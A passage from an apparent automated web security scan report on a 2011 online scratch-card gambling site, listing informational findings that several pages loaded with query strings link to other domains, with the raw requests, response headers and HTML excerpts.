Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:42 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:42 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:42 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:42 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:42 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 57132


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/CrazyScratch/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
<br />
<a class="ContentLinks" target="_blank" href="http://www.gamblersanonymous.org">www.gamblersanonymous.org</a>
...[SNIP]...
<a onclick="OpenLobby();" href="#"><img alt="" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif" style="border: none" /></a>
...[SNIP]...
</a>
        | <a href="http://www.crazyrewards.com" rel="nofollow">Affiliates</a>
...[SNIP]...
<map name="Map" id="Map">
<area shape="rect" coords="68,2,142,33" href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&amp;dn=secure.neogames-tech.com&amp;lang=en" target="_blank" alt="Verisign" rel="nofollow"/>
<area shape="rect" coords="288,3,432,32" href="http://www.neogames.com/" target="_blank" alt="Neogames" rel="nofollow"/>
<area shape="rect" coords="2,2,48,33" href="http://www.info.crazyscratch.com/UnderAge.aspx?CurrencyCode=GBP" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="171,2,261,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf" target="_blank" alt="ItechLabs tested" rel="nofollow"/>
<area shape="rect" coords="468,2,539,33" href="http://www.gamblersanonymous.org/" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="565,2,696,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank" alt="LGA Malta" rel="nofollow"/>
</map>
...[SNIP]...
ta (a member of the EU since May 2007). The Company's registered address is at 135 High Street, Sliema, Malta. The Company operates crazyscratch.com under a license issued and regulated by the <a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank"> Lotteries and Gaming Authority </a>
...[SNIP]...

18.29. http://www.info.crazyscratch.com/ContactUsMail.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /ContactUsMail.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; the relevant references are shown in the response excerpt below.

Request

GET /ContactUsMail.aspx?CurrencyCode=GBP HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:28 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:28 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:28 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:28 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:28 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 62148


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/CrazyScratch/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
</a>
        | <a href="http://www.crazyrewards.com" rel="nofollow">Affiliates</a>
...[SNIP]...
<map name="Map" id="Map">
<area shape="rect" coords="68,2,142,33" href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&amp;dn=secure.neogames-tech.com&amp;lang=en" target="_blank" alt="Verisign" rel="nofollow"/>
<area shape="rect" coords="288,3,432,32" href="http://www.neogames.com/" target="_blank" alt="Neogames" rel="nofollow"/>
<area shape="rect" coords="2,2,48,33" href="http://www.info.crazyscratch.com/UnderAge.aspx?CurrencyCode=GBP" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="171,2,261,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf" target="_blank" alt="ItechLabs tested" rel="nofollow"/>
<area shape="rect" coords="468,2,539,33" href="http://www.gamblersanonymous.org/" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="565,2,696,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank" alt="LGA Malta" rel="nofollow"/>
</map>
...[SNIP]...
ta (a member of the EU since May 2007). The Company's registered address is at 135 High Street, Sliema, Malta. The Company operates crazyscratch.com under a license issued and regulated by the <a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank"> Lotteries and Gaming Authority </a>
...[SNIP]...

18.30. http://www.info.crazyscratch.com/FairPlay.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /FairPlay.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /FairPlay.aspx?CurrencyCode=GBP HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:48:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:01 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:01 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:01 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:01 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:48:01 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 56301


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/CrazyScratch/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
<a onclick="OpenLobby();" href="#"><img alt="" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif" style="border: none" /></a>
...[SNIP]...
</a>
        | <a href="http://www.crazyrewards.com" rel="nofollow">Affiliates</a>
...[SNIP]...
<map name="Map" id="Map">
<area shape="rect" coords="68,2,142,33" href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&amp;dn=secure.neogames-tech.com&amp;lang=en" target="_blank" alt="Verisign" rel="nofollow"/>
<area shape="rect" coords="288,3,432,32" href="http://www.neogames.com/" target="_blank" alt="Neogames" rel="nofollow"/>
<area shape="rect" coords="2,2,48,33" href="http://www.info.crazyscratch.com/UnderAge.aspx?CurrencyCode=GBP" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="171,2,261,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf" target="_blank" alt="ItechLabs tested" rel="nofollow"/>
<area shape="rect" coords="468,2,539,33" href="http://www.gamblersanonymous.org/" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="565,2,696,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank" alt="LGA Malta" rel="nofollow"/>
</map>
...[SNIP]...
ta (a member of the EU since May 2007). The Company's registered address is at 135 High Street, Sliema, Malta. The Company operates crazyscratch.com under a license issued and regulated by the <a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank"> Lotteries and Gaming Authority </a>
...[SNIP]...

18.31. http://www.info.crazyscratch.com/Help.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /Help.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /Help.aspx?CurrencyCode=GBP HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:11 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:11 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:11 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:11 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:11 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 55550


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/CrazyScratch/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
<a href="ContactUsMail.aspx"><img border="0" alt="HelpContactUs" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/Help/HelpContactUs_ENG.gif" /></a>
...[SNIP]...
<a onclick="OpenLobby();" href="#"><img alt="" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif" style="border: none" /></a>
...[SNIP]...
</a>
        | <a href="http://www.crazyrewards.com" rel="nofollow">Affiliates</a>
...[SNIP]...
<map name="Map" id="Map">
<area shape="rect" coords="68,2,142,33" href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&amp;dn=secure.neogames-tech.com&amp;lang=en" target="_blank" alt="Verisign" rel="nofollow"/>
<area shape="rect" coords="288,3,432,32" href="http://www.neogames.com/" target="_blank" alt="Neogames" rel="nofollow"/>
<area shape="rect" coords="2,2,48,33" href="http://www.info.crazyscratch.com/UnderAge.aspx?CurrencyCode=GBP" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="171,2,261,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf" target="_blank" alt="ItechLabs tested" rel="nofollow"/>
<area shape="rect" coords="468,2,539,33" href="http://www.gamblersanonymous.org/" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="565,2,696,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank" alt="LGA Malta" rel="nofollow"/>
</map>
...[SNIP]...
ta (a member of the EU since May 2007). The Company's registered address is at 135 High Street, Sliema, Malta. The Company operates crazyscratch.com under a license issued and regulated by the <a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank"> Lotteries and Gaming Authority </a>
...[SNIP]...

18.32. http://www.info.crazyscratch.com/InviteFriend.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /InviteFriend.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /InviteFriend.aspx?CurrencyCode=GBP HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:45 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:45 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:45 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:45 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:45 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 66940


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/CrazyScratch/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
<a onclick="OpenLobby();" href="#"><img alt="" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif" style="border: none" /></a>
...[SNIP]...
</a>
        | <a href="http://www.crazyrewards.com" rel="nofollow">Affiliates</a>
...[SNIP]...
<map name="Map" id="Map">
<area shape="rect" coords="68,2,142,33" href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&amp;dn=secure.neogames-tech.com&amp;lang=en" target="_blank" alt="Verisign" rel="nofollow"/>
<area shape="rect" coords="288,3,432,32" href="http://www.neogames.com/" target="_blank" alt="Neogames" rel="nofollow"/>
<area shape="rect" coords="2,2,48,33" href="http://www.info.crazyscratch.com/UnderAge.aspx?CurrencyCode=GBP" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="171,2,261,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf" target="_blank" alt="ItechLabs tested" rel="nofollow"/>
<area shape="rect" coords="468,2,539,33" href="http://www.gamblersanonymous.org/" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="565,2,696,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank" alt="LGA Malta" rel="nofollow"/>
</map>
...[SNIP]...
ta (a member of the EU since May 2007). The Company's registered address is at 135 High Street, Sliema, Malta. The Company operates crazyscratch.com under a license issued and regulated by the <a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank"> Lotteries and Gaming Authority </a>
...[SNIP]...

18.33. http://www.info.crazyscratch.com/PlayersClub.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /PlayersClub.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /PlayersClub.aspx?CurrencyCode=GBP HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:59 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:59 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:59 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:59 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:46:59 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 63399


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/CrazyScratch/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
<div class="StandardPageLeftSectionContentDiv">
<img alt="" border="0" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/Club/club_pearl_header.gif" />
<br />
...[SNIP]...
<br />

<img alt="" border="0" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/Club/club_pearl_introduction_ENG.gif" />
<br />
...[SNIP]...
<br />
<img alt="" border="0" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/Club/club_pearl_whatAbout_ENG.gif" />
<br />
...[SNIP]...
<br />
<img alt="" border="0" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/Club/club_pearl_meetteam_ENG.gif" />
<br />
...[SNIP]...
<center>
<img alt="" src="http://download.neogames-tech.com/Brands/General/WebSite/Club/Groupicture.gif" border="0" width="295px" height="221px" />
</center>
...[SNIP]...
<div class="StandardPageLeftSectionContentDiv">
<img alt="" border="0" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/Club/club_pearl_shoutout_ENG.gif" />
<br />
...[SNIP]...
<a onclick="OpenLobby();" href="#"><img alt="" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif" style="border: none" /></a>
...[SNIP]...
</a>
        | <a href="http://www.crazyrewards.com" rel="nofollow">Affiliates</a>
...[SNIP]...
<map name="Map" id="Map">
<area shape="rect" coords="68,2,142,33" href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&amp;dn=secure.neogames-tech.com&amp;lang=en" target="_blank" alt="Verisign" rel="nofollow"/>
<area shape="rect" coords="288,3,432,32" href="http://www.neogames.com/" target="_blank" alt="Neogames" rel="nofollow"/>
<area shape="rect" coords="2,2,48,33" href="http://www.info.crazyscratch.com/UnderAge.aspx?CurrencyCode=GBP" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="171,2,261,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf" target="_blank" alt="ItechLabs tested" rel="nofollow"/>
<area shape="rect" coords="468,2,539,33" href="http://www.gamblersanonymous.org/" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="565,2,696,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank" alt="LGA Malta" rel="nofollow"/>
</map>
...[SNIP]...
ta (a member of the EU since May 2007). The Company's registered address is at 135 High Street, Sliema, Malta. The Company operates crazyscratch.com under a license issued and regulated by the <a href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank"> Lotteries and Gaming Authority </a>
...[SNIP]...

18.34. http://www.info.crazyscratch.com/Privacy.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.info.crazyscratch.com
Path:   /Privacy.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /Privacy.aspx?CurrencyCode=GBP HTTP/1.1
Host: www.info.crazyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: crazyscratchl=ENG; crazyscratchccode=US; crazyscratchp=; crazyscratchlang=English; crazyscratchu=http%3A//www.crazyscratch.com/; CSI_28=EncryptedUniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398&AffiliateID=28&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; LanguageCode=ENG; RegistrationMode=PM; BO=FM; CountryCode=US; CSITemp=28; crazyscratcha=; ASP.NET_SessionId=hg30s4bf4mnutp55xmx3ia45; crazyscratchc=GBP;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:47:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:49 GMT; path=/
Set-Cookie: BO=FM; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:49 GMT; path=/
Set-Cookie: UniqueVisitorID=9BCCE5CA966749482FFECEB2974C1398; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:49 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:49 GMT; path=/
Set-Cookie: CountryCode=US; domain=info.crazyscratch.com; expires=Fri, 16-May-2014 11:47:49 GMT; path=/
Set-Cookie: CSITemp=28; domain=info.crazyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 65544


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<link type="text/css" rel="stylesheet" href="Brands/CrazyScratch/CSS/SkinCss.css" /><link rel="shortcut icon" type="image/x-icon" href="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/favicon.ico" />
<style type="text/css">
...[SNIP]...
<a onclick="OpenLobby();" href="#"><img alt="" src="http://download.neogames-tech.com/Brands/CrazyScratch/Website/General/playnow_button_ENG.gif" style="border: none" /></a>
...[SNIP]...
</a>
        | <a href="http://www.crazyrewards.com" rel="nofollow">Affiliates</a>
...[SNIP]...
<map name="Map" id="Map">
<area shape="rect" coords="68,2,142,33" href="https://sealinfo.verisign.com/splash?form_file=fdf/splash.fdf&amp;dn=secure.neogames-tech.com&amp;lang=en" target="_blank" alt="Verisign" rel="nofollow"/>
<area shape="rect" coords="288,3,432,32" href="http://www.neogames.com/" target="_blank" alt="Neogames" rel="nofollow"/>
<area shape="rect" coords="2,2,48,33" href="http://www.info.crazyscratch.com/UnderAge.aspx?CurrencyCode=GBP" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="171,2,261,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/RNG_certificate_080108.pdf" target="_blank" alt="ItechLabs tested" rel="nofollow"/>
<area shape="rect" coords="468,2,539,33" href="http://www.gamblersanonymous.org/" target="_blank" alt="" rel="nofollow"/>
<area shape="rect" coords="565,2,696,33" href="http://download.neogames-tech.com/Website_Scratch2Cash/WebSite/Images/Lotteries&GamingAuthority.pdf" target="_blank" alt="LGA Malta" rel="nofollow"/>
</map>
...[SNIP]...
